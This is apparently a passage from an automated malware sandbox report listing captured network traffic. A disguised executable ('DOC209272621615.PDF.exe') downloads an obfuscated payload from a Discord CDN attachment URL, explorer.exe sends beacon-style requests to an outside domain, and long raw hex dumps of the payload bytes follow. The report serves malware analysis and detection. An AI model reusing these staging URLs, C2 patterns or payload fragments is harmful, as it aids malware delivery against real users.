http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, some
Dec 1, 2021 16:25:12.374916077 CET	8619	IN	Data Raw: 74 68 69 6e 67 20 6c 6f 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 Data Ascii: thing lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href="/htdocs_error/style.css"> <link rel="stylesheet" href="https://maxc
Dec 1, 2021 16:25:12.374927044 CET	8619	IN	Data Raw: 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: </div> </div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49835	68.70.164.19	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 16:25:22.680155993 CET	8653	OUT	GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=5IYdhC0GHghhu3qU8D/jZG+rEeM2mibLCs+oL86uP0UJoc5Rrxh3LqrepKBtkhDSDZoq HTTP/1.1 Host: www.jardingenesis.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 16:25:22.792427063 CET	8654	IN	HTTP/1.1 404 Not Found Date: Wed, 01 Dec 2021 15:25:22 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49750	162.159.129.233	443	C:\Users\user\Desktop\DOC209272621615.PDF.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 15:22:56 UTC	0	OUT	GET /attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb HTTP/1.1 User-Agent: lVali Host: cdn.discordapp.com
2021-12-01 15:22:56 UTC	0	IN	HTTP/1.1 200 OK Date: Wed, 01 Dec 2021 15:22:56 GMT Content-Type: application/octet-stream Content-Length: 281088 Connection: close CF-Ray: 6b6d50552cf005bb-FRA Accept-Ranges: bytes Age: 36009 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Wkklnmczcyrsyafzucgflytssyuynbb ETag: "95c7205834a4a92a4f9bfc212c2326dc" Expires: Thu, 01 Dec 2022 15:22:56 GMT Last-Modified: Wed, 01 Dec 2021 04:37:50 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1638333470898312 x-goog-hash: crc32c=meGuLw== x-goog-hash: md5=lccgWDSkqSpPm/whLCMm3A== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 281088 X-GUploader-UploadID: ADPycduUlNf2PA7zKpv-QoNOOzrwHgbFRX6mQZp4zDQlyL3kPqYyPZgI-KJkcPR2dvSRCq08DP8GeNCAFObtI59ESkwHkFkhMQ X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
2021-12-01 15:22:56 UTC	1	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 25 32 46 39 68 4e 47 62 69 46 58 66 4c 33 65 48 5a 4c 31 4b 31 4b 75 25 32 46 56 44 37 4c 38 4b 56 63 73 77 6c 50 65 68 59 41 55 63 41 44 37 25 32 42 44 71 6d 51 61 68 34 4a 35 30 67 63 34 69 72 52 52 64 47 5a 63 45 39 6f 6e 42 71 53 76 54 30 53 6a 6d 4f 65 68 77 72 75 4d 30 4d 69 48 71 25 32 42 25 32 46 4f 4e 34 59 32 50 77 66 76 64 67 76 6e 25 32 46 54 5a 37 77 53 59 6a 42 4a 51 6e 35 74 73 31 31 25 32 46 50 45 64 66 25 32 46 39 34 45 25 32 42 44 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F9hNGbiFXfL3eHZL1K1Ku%2FVD7L8KVcswlPehYAUcAD7%2BDqmQah4J50gc4irRRdGZcE9onBqSvT0SjmOehwruM0MiHq%2B%2FON4Y2Pwfvdgvn%2FTZ7wSYjBJQn5ts11%2FPEdf%2F94E%2BDg%3D%3D"}],"group":"cf-nel
2021-12-01 15:22:56 UTC	1	IN	Data Raw: 05 2d 8f 93 8a 79 c5 0e 44 c6 9d be e1 d7 39 a5 be fd 97 87 e8 6c a2 37 a3 b4 f0 6e a8 c5 04 ae d5 36 25 ea 60 83 ec 68 a5 bb 61 08 a9 43 4b 50 e1 d4 b1 48 d6 bb 78 4d 5a ff 8b e1 c8 95 9c 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 Data Ascii: -yD9l7n6%`haCKPHxMZ-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi
2021-12-01 15:22:56 UTC	2	IN	Data Raw: d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 Data Ascii: I$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2
2021-12-01 15:22:56 UTC	4	IN	Data Raw: ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 Data Ascii: 0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4E
2021-12-01 15:22:56 UTC	5	IN	Data Raw: 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 Data Ascii: 2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B
2021-12-01 15:22:56 UTC	6	IN	Data Raw: 79 d8 60 5d b2 1d 21 b3 87 f3 03 9d 69 86 cb a7 72 ef 39 99 dc 82 77 9f f0 2f 30 dc b4 34 99 87 29 18 16 88 f2 6b fb 16 1c bb c8 dc 2a 18 03 ee f1 a9 85 4b 08 74 d0 e4 89 3f e3 84 24 b3 44 38 1f 3b 36 60 5b c3 5b c4 53 c3 16 11 00 4d 05 e7 03 6e 76 f3 b9 c8 56 3b a7 1b 46 62 be 82 e3 9a 59 b1 1f 1c 3a ea bf 3a d6 6b 78 86 ca de a4 9f f7 41 8f d4 62 df 39 49 1e 2b bd bc a6 72 d4 0c e1 99 f4 dc 19 b5 45 0c fd f2 34 7c f8 4e 83 f1 b9 2a 35 c8 8d a9 15 e1 3f 7b be 9a 0d 8b 39 73 6c 64 aa 01 79 a2 2e 51 59 65 47 89 c8 c7 c8 a8 9d 7f ef bf b3 30 56 ad 97 27 3c 90 57 b1 8d b5 a6 e9 b2 42 07 fc c9 55 91 b2 94 db 6b e4 44 4d ba 2b 57 3e f5 23 d9 9b 68 0a e3 1c b7 73 9f 06 16 44 3e ac 94 40 ed 85 a0 cc f4 db 98 9d ea 99 bb be 26 3f 9f 47 00 76 8d a9 a1 7f 34 25 60 Data Ascii: y`]!ir9w/04)k*Kt?$D8;6`[[SMnvV;FbY::kxAb9I+rE4|N*5?{9sldy.QYeG0V'<WBUkDM+W>#hsD>@&?Gv4%`
2021-12-01 15:22:56 UTC	8	IN	Data Raw: f5 8a 2a 58 a2 70 a2 2b de 70 65 17 88 23 b5 6f a8 45 54 80 98 67 57 32 43 c5 24 6a d3 1d 26 0d 62 c8 c9 b6 14 a2 a0 1c af 5b 55 34 45 a9 ec d9 c5 6f e8 19 87 bb 34 58 bf 3a 6e 9f 6f 56 ad 1c 2d 2d bc cd 61 27 27 9d f0 30 4e 7a af bb a6 0b f3 cc c8 cb 47 e4 6b 1c 6d 1a 92 37 fc 4f 31 70 0e ed 14 76 9c 17 80 11 8d f2 7c 5d fa 38 ee 45 15 8a 2d c5 49 18 02 94 d5 06 e8 32 5c e6 55 06 56 ce 73 5a a3 ea 33 c2 cb 58 b6 d7 f1 dc 1b bc a6 cd ac 7a b0 bf b5 7e 06 fe 5f 34 cf ec cd 2e d1 0a f7 d7 6e 59 69 30 3c 01 dc 64 dd 99 c7 f3 de 5a 9f 9a d3 05 76 17 9b 21 00 6b fb ff 55 63 4f 38 71 03 43 24 a5 dd 07 35 f4 40 6d 59 ff 10 67 2d 43 6b 68 f8 55 c2 dc 0e f4 35 67 48 8f d8 e7 db 13 0e fd af 8d a5 f8 50 b7 ff 64 60 3b df 0c e3 85 af 03 db 7a f0 92 3a eb b7 32 54 b0 Data Ascii: *Xp+pe#oETgW2C$j&b[U4Eo4X:noV--a''0NzGkm7O1pv|]8E-I2\UVsZ3Xz~_4.nYi0<dZv!kUcO8qC$5@mYg-CkhU5gHPd`;z:2T
2021-12-01 15:22:56 UTC	9	IN	Data Raw: de 8c 1d ac 89 ad 86 ae 02 f0 46 0c 88 2f c9 4f f0 5d 66 e2 61 dc 28 57 31 c2 ad 8e dc 41 25 21 cd 47 1b a4 1a 2a 73 ed c1 c4 bf 20 3f f5 e3 48 45 50 d2 73 19 88 37 fc 42 76 f9 f3 cb d3 30 43 1c 3d f5 d5 67 48 e5 16 4c 82 39 fe f6 11 ea 5e b1 80 7a 1b ad 0b 43 d3 b0 b7 50 22 62 cf 7b 8b 33 14 c9 55 44 02 ba a9 14 09 54 9b a9 96 2f 41 61 4f 3c 67 b1 13 8f ce 93 4b 41 1d bb 23 95 f9 e3 44 ae 1f a2 6f 61 56 34 96 83 c0 ce 60 d2 e8 32 43 d8 4e 17 07 1c a0 7b 99 c3 5e 06 4a 20 dd f7 4b 1c 39 ff d7 de f7 3f 57 19 12 0c e4 03 7c 44 b4 95 3b d6 74 ff c8 d2 fb fe 7f b5 fb a3 78 12 0e 19 83 4c b6 dd c4 bd b3 16 0f 98 47 b0 f2 68 9f 92 d5 8d b9 36 76 d4 9c 00 e2 3d 71 8c 29 c1 50 ea e7 5a ec 5d c3 bf 28 4f 3c bb c3 a5 5c ec a8 73 7a 15 81 f9 4c 07 29 bf a0 d2 f3 a3 Data Ascii: F/O]fa(W1A%!G*s ?HEPs7Bv0C=gHL9^zCP"b{3UDT/AaO<gKA#DoaV4`2CN{^J K9?W|D;txLGh6v=q)PZ](O<\szL)
2021-12-01 15:22:56 UTC	10	IN	Data Raw: 15 e0 82 4c 83 a3 ef 83 ec 00 63 70 6e a1 e7 8b bc 92 96 57 31 b7 a3 ae 84 35 ec c5 cc 27 da 88 a9 5c d9 7a 15 24 dc 22 be cf e9 ae 89 ad 10 42 aa 48 a5 8e cd 5b 56 af 01 3d eb b7 31 a1 68 fd cd 52 af 5f 1a cf e0 79 0b 64 c7 57 2d b2 89 d2 2c 3d 73 70 fe 49 12 69 40 65 58 c3 d7 69 76 1b b5 c7 93 68 9a 2d 48 9c 74 e2 01 c4 d6 c6 b1 31 56 a1 e1 82 24 79 60 67 e6 6d ef 48 9f fb c8 9c 86 38 51 5a 3d 0f 86 33 c6 7d c7 ca cf 12 86 cd 4e b3 11 54 f3 ab 35 cc 52 50 b0 8d a6 dc 5f ca d1 4f a2 c4 d1 68 f1 fc 0d 9e df f9 41 a4 76 1d b9 21 86 e1 79 f9 49 a8 93 d6 e8 cd 43 da d1 11 16 a4 75 98 48 9d 68 21 0a d8 7d 35 fd d3 7d 38 6e 9c 26 4d 9b 44 9e 67 40 46 80 ab 6c c4 4c 3d fb ca c4 4a e4 38 f1 c3 de a9 16 0a ed 89 38 8c b3 64 47 9c 74 ed ae 9f 1c 57 f8 65 df 10 02 Data Ascii: LcpnW15'\z$"BH[V=1hR_ydW-,=spIi@eXivh-Ht1V$y`gmH8QZ=3}NT5RP_OhAv!yICuHh!}5}8n&MDg@FlL=J88dGtWe
2021-12-01 15:22:56 UTC	12	IN	Data Raw: 01 ee 5e 4c 9b f9 de 07 d1 2d f3 97 a0 f6 48 86 2a 5d 67 9b a8 24 41 8a 21 a5 e3 8b 1b 91 54 6a 92 c7 ae 8b a2 61 1a 6a 7d 8b c0 26 cc ca db 84 1c 58 3e 2d b9 ab f0 28 59 26 c9 31 e3 26 4a 13 7c 16 04 e1 00 97 ce b9 56 26 95 ce fe 4d 13 e9 f9 61 22 b4 12 14 12 18 06 11 f4 d2 c2 4d bc ab 1b a7 45 10 9b 0c 8b 38 dd 86 3c 6a 6e 91 57 f5 b0 15 3c 78 16 0f 16 50 85 21 c1 cc 62 cc cf 6f 88 af 28 33 f3 33 70 ee 2a 5e a1 f4 05 35 c5 cb f2 2c 4b 09 1d 83 ca ef c1 cd de 09 6d 71 88 af c7 d2 9e ec bc ab 12 17 bd d8 41 2a 3f 65 ce e2 09 66 5a 58 63 d7 59 bb cc cd 5b 51 2e 0a 1d e9 d5 f7 24 20 23 aa 6d c3 d2 f9 e3 11 60 ce fa 5c 10 de 88 2b b2 00 3b ed b0 8d 00 74 f0 2f aa 17 7a 10 17 97 33 3d 27 90 69 e1 4d 17 92 52 49 7c 43 4b 69 e4 c9 49 0e 1b 01 b5 3f af 61 dc c2 Data Ascii: ^L-H*]g$A!Tjaj}&X>-(Y&1&J|V&Ma"ME8<jnW<xP!bo(33p*^5,KmqA*?efZXcY[Q.$ #m`\+;t/z3='iMRI|CKiI?a
2021-12-01 15:22:56 UTC	13	IN	Data Raw: c9 52 b3 01 4b 6f 0b 7b 0d 2f cb 40 66 c2 c5 45 8f 0c f6 d1 a5 e7 11 9b 92 31 d0 68 8d a4 67 48 94 73 12 0f 1a 4e ba b7 3a 7f 81 be 38 af 08 75 59 31 5c 77 83 22 3f 8d c6 c9 c2 af 00 c4 d5 69 4f 51 28 de 53 23 a9 1f ba bb 20 b1 d6 f0 a4 be b9 b4 a4 54 d1 67 d8 ad 14 11 90 5e e1 e1 96 c5 2c 54 b7 35 e1 94 57 b7 e1 85 25 74 1c b2 83 8b ca c9 c6 9d fb ca cc c6 e7 ec 25 36 31 c3 54 af 00 cf 78 81 72 0e 87 7e f6 c8 cc fb f7 cc 47 5a a6 65 43 1e 18 63 40 e0 5f 59 3f eb ac 82 31 44 48 69 fc da 01 d4 a5 8c 4c 99 40 2c 50 bf 23 a8 a3 8e 45 93 92 4b 0a f0 2f d5 11 11 4a 75 84 3c 6f 64 48 5d b8 a4 fd 21 a8 9a 41 86 fb d5 d4 95 48 70 e0 80 d5 9f e0 25 8e a5 fc 51 3f fd f5 91 c5 c5 3d df 9a 51 b8 f1 a7 e7 8e 42 06 6e 7b 9c e0 66 cc d3 68 f8 e8 52 3b 96 79 97 d7 ed f8 Data Ascii: RKo{/@fE1hgHsN:8uY1\w"?iOQ(S# Tg^,T5W%t%61Txr~GZeCc@_Y?1DHiL@,P#EK/Ju<odH]!AHp%Q?=QBn{fhR;y
2021-12-01 15:22:56 UTC	14	IN	Data Raw: ea 57 22 1b d4 ed 08 ee a9 f0 6f ee 66 d9 6f 69 79 03 8a 75 86 1c 5e dd 24 20 ab f8 5d 35 fc ad 8a 61 43 0a f0 2c e9 6e cf 6c 66 33 8a 92 8c c8 55 f1 bd 18 02 e3 17 c0 b8 b3 0c fe d6 30 23 af 3f e0 01 29 ab 0b e5 cc c4 d1 70 eb 2f 2b 8c 38 48 b4 a3 4e be 3f 0c e7 0e 5f 4e ba b3 0a 67 b9 6f 72 d0 95 d3 cb 40 fb 2e 07 44 91 23 27 d6 ef a2 76 1c 8d 64 e8 24 95 13 63 df 43 14 80 d4 ed 84 3a 67 d3 3b ea 36 67 4c 09 98 70 ec a3 37 89 c2 da f3 2b a5 ea 3d eb b1 94 9c 45 08 d0 cd 52 80 6c f0 9b b4 2e 93 ad 97 8d b2 9d fc 48 11 5b 6d 68 cc ae 92 ec 46 05 aa 82 0c e0 f7 45 5d 40 64 c6 c8 74 1a 68 fb 54 81 57 8f 26 22 2c d7 74 7f 71 6e f2 ab 85 b7 35 e2 97 d4 d9 6e 1d 3f a1 fc 52 b0 8a b7 f4 6c ed 32 08 ea 3e 63 48 b0 f3 b9 a3 97 a6 69 71 e0 53 2b d1 78 06 7d 79 c9 Data Ascii: W"ofoiyu^$ ]5aC,nlf3U0#?)p/+8HN?_Ngor@.D#'vd$cC:g;6gLp7+=ERl.H[mhFE]@dthTW&",tqn5n?Rl2>cHiqS+x}y
2021-12-01 15:22:56 UTC	16	IN	Data Raw: 4d db dd 00 5c cb e7 e5 0c b3 f0 ea 6a e3 8d 37 1a 10 82 48 5b 10 89 a9 0d ba a8 06 f7 04 8a ad c0 be 3f 6b cd 4c 82 33 24 d1 3f 54 60 d6 e9 24 09 d4 fd cb 41 e7 79 ac 3d 2e 5c df 04 c4 78 0d 7b 88 bf 11 80 b3 63 c6 2e 5a 3c 41 13 97 ca cf f8 e4 a3 fe 92 50 02 0f 31 da 36 7d 1a d2 4d 18 89 6e 55 29 cd 93 dd 2e bf 85 ac 4d 1b 2c 88 83 b7 bb fc e6 00 db 5e c7 e5 6a 5d 49 c1 5a 31 19 28 5b d2 24 89 b3 13 4e ae 34 bb 9f eb 6b 64 41 ce 47 0b e8 f2 80 11 92 97 db 26 de ac 82 e2 12 87 69 de 0b e7 5b ef b2 96 9e 7c bb c1 fa 44 58 bd b3 cf c6 cc 5f 63 49 98 48 98 9d a3 52 cf c5 a1 f5 05 c1 c7 50 17 07 63 e5 28 4c 51 82 9f 04 5a a8 5e 70 d6 f7 df 90 5f c6 fe e7 92 57 2f c2 40 d9 78 05 a2 6c 48 74 f1 bf fc 5e 6c 5b 3a ab 54 de 09 78 57 31 5c 33 df 8d eb b6 2e 4e 33 Data Ascii: M\j7H[?kL3$?T`$Ay=.\x{c.Z<AP16}MnU).M,^j]IZ1([$N4kdAG&i[|DX_cIHRPc(LQZ^p_W/@xlHt^l[:TxW1\3.N3
2021-12-01 15:22:56 UTC	17	IN	Data Raw: 42 95 6a 8a e4 07 77 9c 7d 71 f3 31 0a e3 8e 53 cf 14 86 70 e4 1d be a9 c0 21 f8 97 c9 51 38 38 ca 03 7e 01 d0 22 3b 6b 46 d3 67 5c d0 5d 6c 6f e3 4c 82 2e 55 d6 12 d6 db 1e 1f 0f 9b 63 c0 8d 39 71 34 da 6b 5d 8e cb d0 ce 3b de 8c f5 ce e4 01 e3 82 bd b8 67 41 1b b9 ac 09 b9 3e 76 1b 20 b0 0b a1 6c 7e 93 e2 87 27 11 2b 6f 6f fd 5c 44 04 76 8c be 2c 0e 74 62 8a d2 74 6b e0 d6 da 6a 86 90 5e 41 83 c2 40 ed f2 f6 cf f5 98 c3 2a 5f b3 03 75 e6 73 b8 bb 32 d6 df 29 48 e5 58 b3 e2 e6 90 16 f1 92 cd 16 c8 c3 5d 5c 27 5e 90 a6 ab 10 14 13 a9 e0 82 ae 55 23 a6 71 9f ba 3e eb af 00 52 33 b6 40 fd 42 db 05 56 85 2e 41 03 3e 20 f9 dc 01 a6 f8 bf 6a 03 84 79 83 78 12 17 73 2f a6 a8 9d f7 5f cb fa 71 e7 8c 39 14 d9 99 5d da e8 b3 8b ee e1 86 aa 18 e0 f7 22 62 d1 bb 21 Data Ascii: Bjw}q1Sp!Q88~";kFg\]loL.Uc9q4k];gA>v l~'+oo\Dv,tbtkj^A@*_us2)HX]\'^U#q>R3@BV.A> jyxs/_q9]"b!
2021-12-01 15:22:56 UTC	18	IN	Data Raw: 33 5b de d8 fb de 0f 0e 47 4f c9 47 15 6e 7d 06 f4 c1 cc 04 fb cd 46 82 1b 52 4f 3a 7f 59 3e 97 24 ca 86 3b ff dc 17 12 7a fa a0 87 44 6b 14 f5 17 9b 34 a9 84 c3 79 c8 ba 3b 5d a3 63 f8 ac 0c 9a db 17 92 a8 0e 3a 31 dd 97 da 7e 0a 3a 82 ae e7 96 a4 7d 8e 51 fd c3 35 64 dc e2 00 c7 53 35 f9 d5 d4 df 69 9b 93 42 01 f3 4e a5 e3 7a ea 55 b8 b5 c4 d2 f7 d0 e0 1d bc e0 06 fb cb 42 05 e2 f2 c7 57 26 46 9e 6c f2 2a dc 77 8f 55 ae 97 2b de 0f 63 bd 47 42 17 2c ee ef cb 07 59 6f 98 ce b7 d9 f2 f0 2b 18 89 a8 99 c3 a2 2d ca 57 2d d3 b2 62 0c e3 4c 8a c1 13 34 f0 35 f1 2a c5 f0 25 a2 63 bb cc 8d bf a2 74 ec f1 a5 25 4e 2c c1 f9 cb 54 b3 fb 3b 9b 0f 8c 25 ab 93 be 0a 80 1a 04 fb c6 38 88 45 e3 d3 af 7c 7f bc 5b 38 10 e7 19 fa dd e6 8f cc d9 64 3c eb 75 88 b0 8b ac 03 Data Ascii: 3[GOGn}FRO:Y>$;zDk4y;]c:1~:}Q5dS5iBNzUBW&Fl*wU+cGB,Yo+-W-bL45*%ct%N,T;%8E|[8d<u
2021-12-01 15:22:56 UTC	20	IN	Data Raw: 70 64 2c 52 bb 32 b2 20 4b c1 5f 4d 0e 0f 7a 81 21 e4 1b b1 01 fc 24 cd 2f 47 1d 12 07 a5 e2 6a 69 7f 58 a0 be bc 67 d6 7e 1a cf e6 56 d5 64 ce ff fb 0a 16 0d 60 62 f7 12 08 fe 5a ad f5 4e ed c0 a1 e3 99 25 6b ec ae f8 5e d1 76 24 d1 88 28 5f cd 89 b0 49 05 ad 01 cf e7 cb 59 27 ac 62 2f 82 1f 46 8a 24 ea 3a b1 1f 27 32 0b 6f 7d 89 52 40 17 d6 0a ef a2 e3 d3 3e 72 ff c2 20 73 47 eb b2 86 0e ee 28 59 22 e4 0d a5 ff 01 c5 cd d7 2b dd 80 06 bb ab 87 b5 3e 7c 68 93 48 e1 07 8a bb b4 f9 d8 f4 5f b2 c3 81 44 83 bc 30 c4 5c 90 4c 9e 70 76 7e 02 0f d2 10 d5 68 f8 95 cc 58 4e b0 71 fc ca 81 a0 74 ed 4a b6 8c c7 48 8b 62 c5 8b 4e 2f 5b 1a 00 c7 54 4f c9 c0 f1 1f ad 0d 6d f2 17 3d e4 00 cd 38 09 2d d2 fc cd 20 98 da d6 33 6e 7d d2 b7 2d d1 73 93 5b cf 03 78 1b a7 06 Data Ascii: pd,R2 K_Mz!$/GjiXg~Vd`bZN%k^v$(_IY'b/F$:'2o}R@>r sG(Y"+>|hH_D0\Lpv~hXNqtJHbN/[TOm=8- 3n}-s[x
